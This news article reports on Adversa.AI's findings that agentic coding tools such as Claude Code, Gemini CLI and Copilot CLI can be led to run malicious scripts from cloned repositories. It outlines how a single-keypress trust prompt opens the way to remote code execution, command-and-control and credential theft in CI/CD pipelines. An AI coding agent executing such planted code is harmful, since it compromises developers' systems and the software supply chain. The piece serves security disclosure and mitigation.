Researchers at Adversa.AI have identified potential security vulnerabilities in AI coding tools like Claude Code, posing possible threats to the supply chain. The automated nature of agentic AI, designed to streamline tasks, hides significant risks when manipulated by malicious actors.
Understanding the Vulnerabilities
Claude Code, launched in May 2025, quickly gained popularity among startups and engineering firms due to its efficiency and user satisfaction. However, recent findings show its agentic capabilities can be exploited to execute remote code with minimal effort from attackers. A threat emerges when developers unknowingly incorporate harmful code from repositories, such as GitHub.
Once a developer uses Claude Code for a new task, the tool scans available repositories for useful code. If it downloads and runs a malicious script, the developer’s system is compromised. The tool’s default security prompt, asking if a project is trustworthy, leads users to permit potentially dangerous actions with a single keypress, similar to browser security warnings.
Implications for Developers and CICD
Adversa.AI has demonstrated how the acceptance of unverified code could initiate long-lasting command-and-control operations. The risk heightens when Claude Code is used within continuous integration and continuous delivery (CICD) pipelines. Here, attackers can embed harmful payloads into widely distributed software, accessing sensitive data like environment variables and credentials.
Adversa’s co-founder, Alex Polyakov, noted that developers frequently clone unfamiliar repositories and use Claude Code scripts, making such attacks feasible. Adversa’s findings indicate that other tools like Gemini CLI and Copilot CLI exhibit similar vulnerabilities, underscoring a broader industry issue.
Recommended Mitigations and Industry Response
Despite Adversa’s warnings, Anthropic, the company behind Claude Code, has not implemented any changes, placing responsibility on users to ensure their actions are informed. Adversa suggests blocking certain settings file permissions to mitigate risks and recommends verifying code in CICD processes before deployment.
Further investigations reveal that this vulnerability is not isolated to Claude Code but extends to other agentic coding interfaces. As researchers continue to explore these risks, the focus remains on enhancing security measures to protect against potential supply chain disruptions.
In conclusion, while AI coding tools offer significant productivity benefits, they also require careful oversight to prevent exploitation. Ensuring informed user decisions and implementing robust security protocols are crucial for safeguarding the software supply chain.
